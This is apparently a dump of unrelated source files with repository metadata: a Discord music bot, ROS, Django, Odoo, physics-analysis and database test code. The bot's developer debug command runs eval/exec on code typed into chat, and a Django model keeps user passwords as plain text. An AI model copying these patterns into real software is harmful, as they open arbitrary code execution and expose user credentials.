if func == 'growth':
f = StringIO()
objgraph.show_growth(limit=10, file=f)
f.seek(0)
data = f.read()
f.close()
elif func == 'leaks':
f = StringIO()
objgraph.show_most_common_types(objects=objgraph.get_leaking_objects(), file=f)
f.seek(0)
data = f.read()
f.close()
elif func == 'leakstats':
data = objgraph.typestats(objects=objgraph.get_leaking_objects())
else:
data = eval('objgraph.' + func)
return Response(data, codeblock='py')
@dev_only
async def cmd_debug(self, message, _player, *, data):
codeblock = "```py\n{}\n```"
result = None
if data.startswith('```') and data.endswith('```'):
data = '\n'.join(data.rstrip('`\n').split('\n')[1:])
code = data.strip('` \n')
try:
result = eval(code)
except:
try:
exec(code)
except Exception as e:
traceback.print_exc(chain=False)
return Response("{}: {}".format(type(e).__name__, e))
if asyncio.iscoroutine(result):
result = await result
return Response(codeblock.format(result))
async def on_message(self, message):
await self.wait_until_ready()
message_content = message.content.strip()
if not message_content.startswith(self.config.command_prefix):
return
if message.author == self.user:
log.warning("Ignoring command from myself ({})".format(message.content))
return
if self.config.bound_channels and message.channel.id not in self.config.bound_channels and not message.channel.is_private:
return # if I want to log this I just move it under the prefix check
command, *args = message_content.split(' ') # Uh, doesn't this break prefixes with spaces in them (it doesn't, config parser already breaks them)
command = command[len(self.config.command_prefix):].lower().strip()
handler = getattr(self, 'cmd_' + command, None)
if not handler:
return
if message.channel.is_private:
if not (message.author.id == self.config.owner_id and command == 'wejdz'):
await self.send_message(message.channel, 'NIE PISZ NA PRIV BO CI WYKURWIE.')
return
if message.author.id in self.blacklist and message.author.id != self.config.owner_id:
log.warning("User blacklisted: {0.id}/{0!s} ({1})".format(message.author, command))
return
else:
log.info("{0.id}/{0!s}: {1}".format(message.author, message_content.replace('\n', '\n... ')))
user_permissions = self.permissions.for_user(message.author)
argspec = inspect.signature(handler)
params = argspec.parameters.copy()
sentmsg = response = None
# noinspection PyBroadException
try:
if user_permissions.ignore_non_voice and command in user_permissions.ignore_non_voice:
await self._check_ignore_non_voice(message)
handler_kwargs = {}
if params.pop('message', None):
handler_kwargs['message'] = message
if params.pop('channel', None):
handler_kwargs['channel'] = message.channel
if params.pop('author', None):
handler_kwargs['author'] = message.author
if params.pop('server', None):
handler_kwargs['server'] = message.server
if params.pop('player', None):
handler_kwargs['player'] = await self.get_player(message.channel)
if params.pop('_player', None):
handler_kwargs['_player'] = self.get_player_in(message.server)
if params.pop('permissions', None):
handler_kwargs['permissions'] = user_permissions
if params.pop('user_mentions', None):
handler_kwargs['user_mentions'] = list(map(message.server.get_member, message.raw_mentions))
if params.pop('channel_mentions', None):
handler_kwargs['channel_mentions'] = list(map(message.server.get_channel, message.raw_channel_mentions))
if params.pop('voice_channel', None):
handler_kwargs['voice_channel'] = message.server.me.voice_channel
if params.pop('leftover_args', None):
handler_kwargs['leftover_args'] = args
args_expected = []
for key, param in list(params.items()):
# parse (*args) as a list of args
if param.kind == param.VAR_POSITIONAL:
handler_kwargs[key] = args
params.pop(key)
continue
# parse (*, args) as args rejoined as a string
# multiple of these arguments will have the same value
if param.kind == param.KEYWORD_ONLY and param.default == param.empty:
handler_kwargs[key] = ' '.join(args)
params.pop(key)
continue
doc_key = '[{}={}]'.format(key, param.default) if param.default is not param.empty else key
args_expected.append(doc_key)
# Ignore keyword args with default values when the command had no arguments
if not args and param.default is not param.empty:
params.pop(key)
continue
# Assign given values to positional arguments
if args:
arg_value = args.pop(0)
handler_kwargs[key] = arg_value
params.pop(key)
if message.author.id != self.config.owner_id:
if user_permissions.command_whitelist and command not in user_permissions.command_whitelist:
raise exceptions.PermissionsError(
"This command is not enabled for your group ({}).".format(user_permissions.name),
expire_in=20)
elif user_permissions.command_blacklist and command in user_permissions.command_blacklist:
raise exceptions.PermissionsError(
"This command is disabled for your group ({}).".format(user_permissions.name),
expire_in=20)
# Invalid usage, return docstring
if params:
docs = getattr(handler, '__doc__', None)
if not docs:
docs = 'Usage: {}{} {}'.format(
self.config.command_prefix,
command,
' '.join(args_expected)
)
docs = dedent(docs)
await self.safe_send_message(
message.channel,
'```\n{}\n```'.format(docs.format(command_prefix=self.config.command_prefix)),
expire_in=60
)
return
response = await handler(**handler_kwargs)
if response and isinstance(response, Response):
content = response.content
if response.reply:
content = '{}, {}'.format(message.author.mention, content)
sentmsg = await self.safe_send_message(
message.channel, content,
expire_in=response.delete_after if self.config.delete_messages else 0,
also_delete=message if self.config.delete_invoking else None
)
except (exceptions.CommandError, exceptions.HelpfulError, exceptions.ExtractionError) as e:
log.error("Error in {0}: {1.__class__.__name__}: {1.message}".format(command, e), exc_info=True)
expirein = e.expire_in if self.config.delete_messages else None
alsodelete = message if self.config.delete_invoking else None
await self.safe_send_message(
message.channel,
'```\n{}\n```'.format(e.message),
expire_in=expirein,
also_delete=alsodelete
)
except exceptions.Signal:
raise
except Exception:
log.error("Exception in on_message", exc_info=True)
if self.config.debug_mode:
await self.safe_send_message(message.channel, '```\n{}\n```'.format(traceback.format_exc()))
finally:
if not sentmsg and not response and self.config.delete_invoking:
await asyncio.sleep(5)
await self.safe_delete_message(message, quiet=True)
async def on_voice_state_update(self, before, after):
if not self.init_ok:
return # Ignore stuff before ready
state = VoiceStateUpdate(before, after)
if state.broken:
log.voicedebug("Broken voice state update")
return
if state.resuming:
log.debug("Resumed voice connection to {0.server.name}/{0.name}".format(state.voice_channel))
if not state.changes:
log.voicedebug("Empty voice state update, likely a session id change")
return # Session id change, pointless event
################################
log.voicedebug("Voice state update for {mem.id}/{mem!s} on {ser.name}/{vch.name} -> {dif}".format(
mem = state.member,
ser = state.server,
vch = state.voice_channel,
dif = state.changes
))
if not state.is_about_my_voice_channel:
return # Irrelevant channel
if state.joining or state.leaving:
log.info("{0.id}/{0!s} has {1} {2}/{3}".format(
state.member,
'joined' if state.joining else 'left',
state.server,
state.my_voice_channel
))
if not self.config.auto_pause:
return
autopause_msg = "{state} in {channel.server.name}/{channel.name} {reason}"
auto_paused = self.server_specific_data[after.server]['auto_paused']
player = await self.get_player(state.my_voice_channel)
if state.joining and state.empty() and player.is_playing:
log.info(autopause_msg.format(
state = "Pausing",
channel = state.my_voice_channel,
reason = "(joining empty channel)"
).strip())
self.server_specific_data[after.server]['auto_paused'] = True
player.pause()
return
if not state.is_about_me:
if not state.empty(old_channel=state.leaving):
if auto_paused and player.is_paused:
log.info(autopause_msg.format(
state = "Unpausing",
channel = state.my_voice_channel,
reason = ""
).strip())
self.server_specific_data[after.server]['auto_paused'] = False
player.resume()
else:
if not auto_paused and player.is_playing:
log.info(autopause_msg.format(
state = "Pausing",
channel = state.my_voice_channel,
reason = "(empty channel)"
).strip())
self.server_specific_data[after.server]['auto_paused'] = True
player.pause()
async def on_server_update(self, before:discord.Server, after:discord.Server):
if before.region != after.region:
log.warning("Server \"%s\" changed regions: %s -> %s" % (after.name, before.region, after.region))
await self.reconnect_voice_client(after)
async def on_server_join(self, server:discord.Server):
log.info("Bot has been joined server: {}".format(server.name))
if not self.user.bot:
alertmsg = "<@{uid}> Hi I'm a musicbot please mute me."
if server.id == "81384788765712384" and not server.unavailable: # Discord API
playground = server.get_channel("94831883505905664") or discord.utils.get(server.channels, name='playground') or server
await self.safe_send_message(playground, alertmsg.format(uid="98295630480314368")) # fake abal
elif server.id == "129489631539494912" and not server.unavailable: # Rhino Bot Help
bot_testing = server.get_channel("134771894292316160") or discord.utils.get(server.channels, name='bot-testing') or server
await self.safe_send_message(bot_testing, alertmsg.format(uid="98295630480314368")) # also fake abal
log.debug("Creating data folder for server %s", server.id)
pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
async def on_server_remove(self, server: discord.Server):
log.info("Bot has been removed from server: {}".format(server.name))
log.debug('Updated server list:')
[log.debug(' - ' + s.name) for s in self.servers]
if server.id in self.players:
self.players.pop(server.id).kill()
async def on_server_available(self, server: discord.Server):
if not self.init_ok:
return # Ignore pre-ready events
log.debug("Server \"{}\" has become available.".format(server.name))
player = self.get_player_in(server)
if player and player.is_paused:
av_paused = self.server_specific_data[server]['availability_paused']
if av_paused:
log.debug("Resuming player in \"{}\" due to availability.".format(server.name))
self.server_specific_data[server]['availability_paused'] = False
player.resume()
async def on_server_unavailable(self, server: discord.Server):
log.debug("Server \"{}\" has become unavailable.".format(server.name))
player = self.get_player_in(server)
if player and player.is_playing:
log.debug("Pausing player in \"{}\" due to unavailability.".format(server.name))
self.server_specific_data[server]['availability_paused'] = True
player.pause()
|
[
"noreply@github.com"
] |
EZIO1337.noreply@github.com
|
950cf5404ea2b75c9cadf94aa12dfbb274256e43
|
70ad3badf3fa6e2edf1889d8640f25a7ec0d9db1
|
/ros_catkin_ws/devel_isolated/rosparam/lib/python2.7/dist-packages/rosparam/__init__.py
|
979cdadf5761c2736f68558fa36dbd74e4175656
|
[] |
no_license
|
MathieuHwei/OldGaitMaven
|
758a937dfda2cf4f1aee266dbbf682ef34989199
|
873f7d9089c5d1c0772bd3447e2b0a31dac68b70
|
refs/heads/main
| 2023-06-17T18:40:06.230823
| 2021-07-19T23:08:20
| 2021-07-19T23:08:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,030
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/pi/ros_catkin_ws/src/ros_comm/rosparam/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
|
[
"giahuy050201@gmail.com"
] |
giahuy050201@gmail.com
|
b80ac7ea9d7671918a54c63f69fe2187f54ccda5
|
061cc9968cac30ca8c5aff4537c4332ae6ca2600
|
/MyCmdb/Users/models.py
|
46cebfa4541ab8c771c5ca2c7655830c658532c7
|
[] |
no_license
|
zhubingbi/-Company-script
|
14ebf83904e54e829ad1ad233d3faa1a8df3acd5
|
b5306e5f7214a1a887d65020f48afc88067645ff
|
refs/heads/master
| 2020-12-02T06:38:08.071754
| 2017-11-15T02:46:11
| 2017-11-15T02:46:11
| 96,868,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
# coding=utf-8
from django.db import models
# Create your models here.
class Users(models.Model):
user = models.CharField(max_length=32, verbose_name='用户名')
password = models.CharField(max_length=32, verbose_name='用户密码')
phone = models.CharField(max_length=32, verbose_name='注册电话')
birthday = models.CharField(max_length=32, verbose_name='用户生日')
email = models.EmailField(blank=True, null=True, verbose_name='邮箱')
groups = models.CharField(max_length=32, null=True, verbose_name='用户业务分组')
photo = models.ImageField(upload_to='uploadImg', blank=True, null=True, verbose_name='用户头像')
isadmin = models.CharField(max_length=32, blank=True, null=True, verbose_name='是否具有管理员权限')
|
[
"zhubingbi@gmail.com"
] |
zhubingbi@gmail.com
|
72522674426e18924bfd748a8caddecc1218f247
|
3282960df3031dfdf48dc7f3ac0433faff84b4f6
|
/Lista02/Ex005.py
|
0b0299ad9dd8756ccbcffe5b2f9f7991d2af5adb
|
[] |
no_license
|
fillipe-felix/ExerciciosPython
|
603120ea05dfcd627ae970f090df5f8072228706
|
119badd286c525397b56d514f8430c93a5eb2c4d
|
refs/heads/master
| 2020-03-23T02:48:26.656961
| 2018-07-15T18:19:08
| 2018-07-15T18:19:08
| 140,993,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
"""
Faça um programa para a leitura de duas notas parciais de um aluno.
O programa deve calcular a média alcançada por aluno e apresentar:
A mensagem "Aprovado", se a média alcançada for maior ou igual a sete;
A mensagem "Reprovado", se a média for menor do que sete;
A mensagem "Aprovado com Distinção", se a média for igual a dez.
"""
nota1 = float(input("Digite a primeira nota: "))
nota2 = float(input("Digite a segunda nota: "))
media = (nota1 + nota2) / 2
if(media == 10):
print("o aluno foi APROVADO COM DISTINÇÂO")
elif(media >= 7):
print("O aluno foi APROVADO")
elif(media < 7):
print("O aluno foi REPROVADO")
|
[
"felipesoares_1993@hotmail.com"
] |
felipesoares_1993@hotmail.com
|
19ed9b12b8f92747a7d5730dd8e9cfa7b98d1e12
|
6ed0b6576857efc67901790dbf926c558d440bd7
|
/backend/manage.py
|
a6ec92e1ac1e5abe024afe74dc330d67aa5ff4bc
|
[] |
no_license
|
crowdbotics-apps/test-aline-0721-dev-7964
|
dae692cc48e757e0275c853ae975d90de97a1657
|
3104874e1b83a8863942ee6a10c2a8aceb6e52f5
|
refs/heads/master
| 2022-11-19T23:22:20.735744
| 2020-07-22T15:50:19
| 2020-07-22T15:50:19
| 281,442,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 644
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_aline_0721_dev_7964.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
b5208a1ac2fd56dab09c83af59823316ebe6b71a
|
3bd40415aabba9ba705e8e20387d3521a48004eb
|
/Interview Preparation Kit/Dictionaries and Hashmaps/Hash Tables: Ransom Note.py
|
ab86513fa9454ca63732fa9788b15f6984fdcd4d
|
[] |
no_license
|
Narendran36/HackerRank
|
7da6f4ffc8a21031d3776c82e8969ca79eca0b06
|
f58ce1cfaa383ed8aec8ec10467048f6f8465624
|
refs/heads/master
| 2022-12-04T04:25:19.062493
| 2020-08-19T19:13:24
| 2020-08-19T19:13:24
| 256,822,744
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
#!/bin/python3
from collections import Counter
# Complete the checkMagazine function below.
def checkMagazine(magazine, note):
if (Counter(note) - Counter(magazine)) == {}:
print("Yes")
else:
print("No")
if __name__ == '__main__':
mn = input().split()
m = int(mn[0])
n = int(mn[1])
magazine = input().rstrip().split()
note = input().rstrip().split()
checkMagazine(magazine, note)
|
[
"noreply@github.com"
] |
Narendran36.noreply@github.com
|
0a6cac0a18fbccdf78c9aa59c0e8286c8bfe542c
|
4bf45827230011d8417ff797fe97b946921abaa3
|
/starfish/core/intensity_table/test/test_synthetic_intensities.py
|
6f35cb355c0e13c9e0b699f06bd4270a550c3905
|
[
"MIT"
] |
permissive
|
kne42/starfish
|
713eb9666c29d89b6d0b25ee36b63761c15de336
|
78b348c9756f367221dcca725cfa5107e5520b33
|
refs/heads/master
| 2020-04-19T19:41:37.736938
| 2019-07-18T00:14:16
| 2019-07-18T00:14:16
| 168,395,751
| 0
| 0
|
MIT
| 2019-09-24T02:38:16
| 2019-01-30T18:45:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
"""
Tests for IntensityTable.synthetic_intensities method.
"""
import numpy as np
from starfish.core.codebook.test.factories import codebook_array_factory
from starfish.core.types import Axes, Features
from ..intensity_table import IntensityTable
def test_synthetic_intensity_generation():
"""
Create a 2-spot IntensityTable of pixel size (z=3, y=4, x=5) from a codebook with 3 channels
and 2 rounds.
Verify that the constructed Synthetic IntensityTable conforms to those dimensions, and given
a known random seed, that the output spots decode to match a target in the input Codebook
"""
# set seed to check that codebook is matched. This seed generates 2 instances of GENE_B
np.random.seed(2)
codebook = codebook_array_factory()
num_z, height, width = 3, 4, 5
intensities = IntensityTable.synthetic_intensities(
codebook,
num_z=num_z,
height=height,
width=width,
n_spots=2,
)
# sizes should match codebook
assert intensities.sizes[Axes.ROUND] == 2
assert intensities.sizes[Axes.CH] == 3
assert intensities.sizes[Features.AXIS] == 2
# attributes should be bounded by the specified size
assert np.all(intensities[Axes.ZPLANE.value] <= num_z)
assert np.all(intensities[Axes.Y.value] <= height)
assert np.all(intensities[Axes.X.value] <= width)
# both codes should match GENE_B
assert np.array_equal(
np.where(intensities.values),
[[0, 0, 1, 1], # two each in feature 0 & 1
[1, 2, 1, 2], # one each in channel 1 & 2
[1, 0, 1, 0]], # channel 1 matches round 1, channel 2 matches round zero
)
|
[
"noreply@github.com"
] |
kne42.noreply@github.com
|
7126110b6be5e67ec95d040579d17ce5b4278f11
|
0b51bc6c7a98d07880955a31e147c0c15b1e3151
|
/tonkho/models/stock_quant.py
|
da383abe5fd406bbfc64072e6fd0731db111501c
|
[] |
no_license
|
tu95ctv/duan_mi2
|
72e8bcbad73dfea1b57b69dbfd1c8d48ecebb975
|
f1728d99e27fcc18684d50f5719f3dcedcffd755
|
refs/heads/master
| 2020-04-28T21:30:25.017845
| 2019-07-07T13:25:43
| 2019-07-07T13:25:43
| 175,584,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,283
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import UserError, ValidationError
from odoo.tools.translate import _
from odoo.tools.float_utils import float_compare
from odoo.addons.tutool.mytools import name_compute
from odoo.addons.tonkho.tonkho_tool import write_to_current_path
from odoo.addons.tutool.mytools import pn_replace
from lxml import etree
class Quant(models.Model):
""" Quants are the smallest unit of stock physical instances """
_inherit = "stock.quant"
pn = fields.Char(related='product_id.pn', store=True,string="Part number")
categ_id = fields.Many2one('product.category', related='product_id.categ_id',store=True,string=u'Nhóm')
thiet_bi_id = fields.Many2one('tonkho.thietbi',related='product_id.thiet_bi_id', string = u'Thiết bị',store=True)
brand_id = fields.Many2one('tonkho.brand',related='product_id.brand_id',string=u'Hãng sản xuất',store=True)
tracking = fields.Selection([
('serial', 'By Unique Serial Number'),
('none', 'No Tracking')], string=u"Có SN hay không", related='product_id.tracking',store=True)
stock_location_id_selection = fields.Selection('get_stock_for_selection_field_',store=False)
tinh_trang = fields.Selection([('tot',u'Tốt'),('hong',u'Hỏng')],default='tot',related='lot_id.tinh_trang',store=True,string=u'Tình trạng')
ghi_chu = fields.Text(string=u'Ghi chú',related='lot_id.ghi_chu')
stt = fields.Integer()
inventory_line_id = fields.Many2one('stock.inventory.line')
# ml_ids = fields.One2many('stock.move.line','lot_id',compute='ml_ids_',string=u'Các dòng điều chỉnh')
ml_ids = fields.Many2many('stock.move.line','stock_quant_stock_move_line_rel','quant_id','move_line_id',compute='ml_ids_',
string=u'Các dòng điều chỉnh')
# @api.depends('is_done_ml_filter','is_your_department_filter','id_show')
def ml_ids_(self):
for r in self:
# active_id = r.id_show
domain = [('lot_id','=',r.lot_id.id),('product_id','=',r.product_id.id),'|',('location_id','=',r.location_id.id),('location_dest_id','=',r.location_id.id)]# r.id = new object nên không được
# if r.is_done_ml_filter:
# domain.append(('state','=','done'))
# if r.is_your_department_filter:
# your_department_id = self.env.user.department_id.id
# # department_domain = ['|',('location_id.department_id','=',your_department_id),('location_dest_id.department_id','=',your_department_id)]
# domain.extend(department_domain)
r.ml_ids = self.env['stock.move.line'].search(domain,order='id desc')
# is_done_ml_filter = fields.Boolean(default= True,store=False, string=u'Chỉ lọc dòng hoàn thành')
# is_your_department_filter = fields.Boolean(default= True,store=False,string =u'Chỉ lọc kho đơn vị của bạn')
# id_show = fields.Integer(compute='id_show_')
# def id_show_(self):
# for r in self:
# r.id_show = r.id
@api.model
def create(self, values):
if 'update_inventory' in self._context:
values.update(self._context['update_inventory'])
res = super(Quant, self).create(values)
return res
def get_stock_for_selection_field_(self):
locs = self.env['stock.location'].search([('is_kho_cha','=',True)])
rs = list(map(lambda i:(i.name,i.name),locs))
return rs
# @api.constrains('lot_id')
# def check_product_id(self):
# not_allow_check_lot_id_in_different_location =self.env['ir.config_parameter'].sudo().get_param('tonkho.not_allow_check_lot_id_in_different_location' )
# if not_allow_check_lot_id_in_different_location ==False:
# if self.lot_id:
# rs = self.env['stock.quant'].search([('lot_id','=',self.lot_id.id),('quantity','>',0)])
# if len(rs)>1:
# raise UserError(u'Không được có quants nội bộ chung lot_id và quantity > 0 product:%s-sn: %s'%(self.product_id.name,self.lot_id.name))
@api.constrains('location_id','quantity')
def not_allow_negative_qty(self):
for r in self:
if not r.location_id.cho_phep_am:
if r.quantity < 0:
raise UserError ( u' Kho:%s, không cho phép tạo âm- sản phẩm:%s-Serial number:%s'%(r.location_id.name,r.product_id.name,r.lot_id.name))
# GHI ĐÈ CÁI XEM DỊCH CHUYỂN KHO, KHÔNG CẦN LỌC VỊ TRÍ KHO
def action_view_stock_moves(self):
self.ensure_one()
action = self.env.ref('stock.stock_move_line_action').read()[0]
action['domain'] = [
('product_id', '=', self.product_id.id),
# '|', ('location_id', '=', self.location_id.id),
# ('location_dest_id', '=', self.location_id.id),
('lot_id', '=', self.lot_id.id),
('package_id', '=', self.package_id.id)]
return action
def name_get(self):
res = []
for r in self:
adict=[
('product_id',{'pr':None,'func':lambda r: r.name + (' [PN:%s]'%r.pn if r.pn else '')}),
# ('product_id',{'pr':None}),
('lot_id',{'pr':None,'func':lambda r: r.name,'skip_if_False':False}),
('quantity',{'pr':None,'func':lambda val:'%s'%val,'skip_if_False':False}),
]
name = name_compute(r,adict,join_char = u' | ')
res.append((r.id,name))
return res
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
context = self._context or {}
if context.get('kho_da_chon') !=None:
choosed_list = context.get('kho_da_chon') [0][2]
args +=[('id','not in',choosed_list)]
if name:
pn_replace_str = pn_replace(name)
else:
pn_replace_str = ''
recs = self.search(['|','|',('product_id', operator, name),('product_id.pn_replace', operator, pn_replace_str),('lot_id.name', operator, name)] + args, limit=limit)
return recs.name_get()
@api.model
def search(self, args, offset=0, limit=None, order=None, count=False):
context = self._context or {}
if context.get('kho_da_chon') !=None:
choosed_list = context.get('kho_da_chon') [0][2]
args +=[('id','not in',choosed_list)]
return super(Quant, self).search(args, offset, limit, order, count=count)
@api.constrains('quantity')
def check_quantity(self):
for quant in self:
if float_compare(quant.quantity, 1, precision_rounding=quant.product_uom_id.rounding) > 0 and quant.lot_id and quant.product_id.tracking == 'serial':
raise ValidationError(_('A serial number should only be linked to a single product. %s,%s,%s'%(quant.quantity,quant.product_id.name,quant.lot_id.name)))
@api.model
def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):
res = super(Quant, self).fields_view_get(
view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
if view_type =='search':
# write_to_current_path(u'%s'%res['arch'])
# print ("res['arch']",res['arch'])
doc = etree.fromstring(res['arch'])
node = doc.xpath("//filter[@name='locationgroup']")[0]
node.addnext(etree.Element('separator', {}))
node.addnext(etree.Element('filter', {'string':'Lọc theo kho của trạm %s'%self.env.user.department_id.name,'name': 'loc_theo_tram_137', 'domain': "[('location_id.department_id','=',%s)]"%self.env.user.department_id.id}))
res['arch'] = etree.tostring(doc, encoding='unicode')
return res
|
[
"nguyenductu@gmail.com"
] |
nguyenductu@gmail.com
|
a87bf5f31c6025305ca0fd7c72b461abad7671a5
|
b2075a92c3854c921a95673a3c5ebb424ab08112
|
/python/postprocessing/framework/postprocessor.py
|
9eb1775d8dbd0f52159a9b31d8202b7f33272466
|
[] |
no_license
|
vhbb/nanoAOD-tools
|
cd2a6305991369948bb9577c5da3c7e4db275c52
|
14bce3dca68288e65b2daefce755d65914a3765d
|
refs/heads/master
| 2021-09-04T21:44:29.892241
| 2018-01-22T12:50:50
| 2018-01-22T12:50:50
| 106,291,673
| 1
| 1
| null | 2018-01-22T12:50:51
| 2017-10-09T14:06:47
|
Python
|
UTF-8
|
Python
| false
| false
| 4,843
|
py
|
#!/usr/bin/env python
import os
import time
import ROOT
ROOT.PyConfig.IgnoreCommandLineOptions = True
from PhysicsTools.NanoAODTools.postprocessing.framework.branchselection import BranchSelection
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import InputTree
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import eventLoop
from PhysicsTools.NanoAODTools.postprocessing.framework.output import FriendOutput, FullOutput
from PhysicsTools.NanoAODTools.postprocessing.framework.preskimming import preSkim
from PhysicsTools.NanoAODTools.postprocessing.framework.jobreport import JobReport
class PostProcessor :
def __init__(self,outputDir,inputFiles,cut=None,branchsel=None,modules=[],compression="LZMA:9",friend=False,postfix=None,
jsonInput=None,noOut=False,justcount=False,provenance=False,haddFileName=None,fwkJobReport=False):
self.outputDir=outputDir
self.inputFiles=inputFiles
self.cut=cut
self.modules=modules
self.compression=compression
self.postfix=postfix
self.json=jsonInput
self.noOut=noOut
self.friend=friend
self.justcount=justcount
self.provenance=provenance
self.jobReport = JobReport() if fwkJobReport else None
self.haddFileName=haddFileName
if self.jobReport and not self.haddFileName :
print "Because you requested a FJR we assume you want the final hadd. No name specified for the output file, will use tree.root"
self.haddFileName="tree.root"
self.branchsel = BranchSelection(branchsel) if branchsel else None
def run(self) :
if not self.noOut:
outpostfix = self.postfix if self.postfix != None else ("_Friend" if self.friend else "_Skim")
if self.compression != "none":
ROOT.gInterpreter.ProcessLine("#include <Compression.h>")
(algo, level) = self.compression.split(":")
compressionLevel = int(level)
if algo == "LZMA": compressionAlgo = ROOT.ROOT.kLZMA
elif algo == "ZLIB": compressionAlgo = ROOT.ROOT.kZLIB
else: raise RuntimeError("Unsupported compression %s" % algo)
else:
compressionLevel = 0
print "Will write selected trees to "+self.outputDir
if not self.justcount:
if not os.path.exists(self.outputDir):
os.system("mkdir -p "+self.outputDir)
if self.noOut:
if len(self.modules) == 0:
raise RuntimeError("Running with --noout and no modules does nothing!")
for m in self.modules: m.beginJob()
fullClone = (len(self.modules) == 0)
outFileNames=[]
t0 = time.clock()
totEntriesRead=0
for fname in self.inputFiles:
# open input file
inFile = ROOT.TFile.Open(fname)
#get input tree
inTree = inFile.Get("Events")
totEntriesRead+=inTree.GetEntries()
# pre-skimming
elist,jsonFilter = preSkim(inTree, self.json, self.cut)
if self.justcount:
print 'Would select %d entries from %s'%(elist.GetN() if elist else inTree.GetEntries(), fname)
continue
else:
print 'Pre-select %d entries out of %s '%(elist.GetN() if elist else inTree.GetEntries(),inTree.GetEntries())
if fullClone:
# no need of a reader (no event loop), but set up the elist if available
if elist: inTree.SetEntryList(elist)
else:
# initialize reader
inTree = InputTree(inTree, elist)
# prepare output file
outFileName = os.path.join(self.outputDir, os.path.basename(fname).replace(".root",outpostfix+".root"))
outFile = ROOT.TFile.Open(outFileName, "RECREATE", "", compressionLevel)
outFileNames.append(outFileName)
if compressionLevel: outFile.SetCompressionAlgorithm(compressionAlgo)
# prepare output tree
if self.friend:
outTree = FriendOutput(inFile, inTree, outFile)
else:
outTree = FullOutput(inFile, inTree, outFile, branchSelection = self.branchsel, fullClone = fullClone, jsonFilter = jsonFilter,provenance=self.provenance)
# process events, if needed
if not fullClone:
(nall, npass, timeLoop) = eventLoop(self.modules, inFile, outFile, inTree, outTree)
print 'Processed %d preselected entries from %s (%s entries). Finally selected %d entries' % (nall, fname, inTree.GetEntries(), npass)
else:
print 'Selected %d entries from %s' % (outTree.tree().GetEntries(), fname)
# now write the output
outTree.write()
outFile.Close()
print "Done %s" % outFileName
if self.jobReport:
self.jobReport.addInputFile(fname,nall)
for m in self.modules: m.endJob()
print totEntriesRead/(time.clock()-t0), "Hz"
if self.haddFileName :
os.system("./haddnano.py %s %s" %(self.haddFileName," ".join(outFileNames))) #FIXME: remove "./" once haddnano.py is distributed with cms releases
if self.jobReport :
self.jobReport.addOutputFile(self.haddFileName)
self.jobReport.save()
|
[
"andrea.rizzi@cern.ch"
] |
andrea.rizzi@cern.ch
|
f0c4e325811d89d928a9cf866949779e8aabab87
|
500ab8c56380741f8ec2e794e42deed6ee9c84df
|
/tests/test_concurrency.py
|
6ca2415aabb7f9516b38a70a1155ac504a23764f
|
[
"Apache-2.0"
] |
permissive
|
antonf/rethinktx
|
1686e11edf92a7d778681b5be526e55b9d11af1d
|
60bbe10ad46030cbcc7727b479ee5bd2355f1fcd
|
refs/heads/master
| 2020-12-05T16:18:36.610124
| 2017-03-19T23:25:43
| 2017-03-19T23:25:43
| 66,806,377
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,436
|
py
|
# Copyright 2016, Anton Frolov <frolov.anton@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import random
import threading
import uuid
import rethinkdb
import rethinktx
import six
from . import mocks
import unittest
LOG = logging.getLogger(__name__)
NUM_ACCOUNTS = 10
NUM_ITERATIONS = 100
NUM_THREADS = 10
def perform_work(conn, account_ids):
for _ in six.moves.range(NUM_ITERATIONS):
acct_from_id, acct_to_id = random.sample(account_ids, 2)
try:
with rethinktx.Transaction(conn) as tx:
accounts_tbl = tx.table('accounts')
acct_from = accounts_tbl.get(acct_from_id)
acct_to = accounts_tbl.get(acct_to_id)
acct_from['balance'] -= 10
acct_to['balance'] += 10
accounts_tbl.put(acct_from_id, acct_from)
accounts_tbl.put(acct_to_id, acct_to)
except rethinktx.OptimisticLockFailure:
pass
except rethinkdb.ReqlAvailabilityError:
pass
